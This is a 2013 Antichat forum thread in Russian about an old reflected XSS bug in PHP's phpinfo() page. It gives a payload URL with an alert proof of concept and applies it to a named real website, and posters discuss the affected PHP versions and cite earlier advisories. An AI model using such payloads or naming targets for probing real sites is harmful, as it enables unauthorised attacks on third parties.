Форум АНТИЧАТ - Xss в phpinfo().

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)

- - Xss в phpinfo(). (https://forum.antichat.xyz/showthread.php?t=398371)

psihoz26

04.11.2013 02:59

Не нашел про данную уязвимoсть ничего на форуме и поэтому решил запостить.

Формат уязвимой ссылки:

Код:

Code:

httр://site.com/phpinfo.php?a[]=alert('xss')

Пример:

Код:

Code:

http://www.infineform.com/info.php?a[]=alert('xss')

WallHack

04.11.2013 11:51

Я на хостинге сайтов находил phpinfo надо проверить на XSS )

Unknown

04.11.2013 12:16

Это старая бага:

http://www.php-security.org/MOPB/MOPB-08-2007.html

http://www.exploit-db.com/exploits/3405/

На том сайте что ты скинул для примера

Код:

Code:

Build Date         Sep 28 2005 12:31:10

Версия правда 5.0.4, а пишут что только четвёртая ветка уязвима.

Короче будет работать только на очень старых версиях PHP.

попугай

04.11.2013 15:01

В четвертых версиях еще запатчили. Странно, почему на 5.0.4 вообще работает. Может не в четвертой, а в ранних версиях пятой.

t3cHn0iD

04.11.2013 15:11

Мда.Какая глобальная и "новая" уязвимость.

psihoz26

20.11.2013 17:03

Я нигде не писал что уязвимость новая и что я её лично нашёл.

Не все же знали про эту уязвимость и на форуме не было упоминания её.

Кому надо взяли на заметку.

Время: 07:27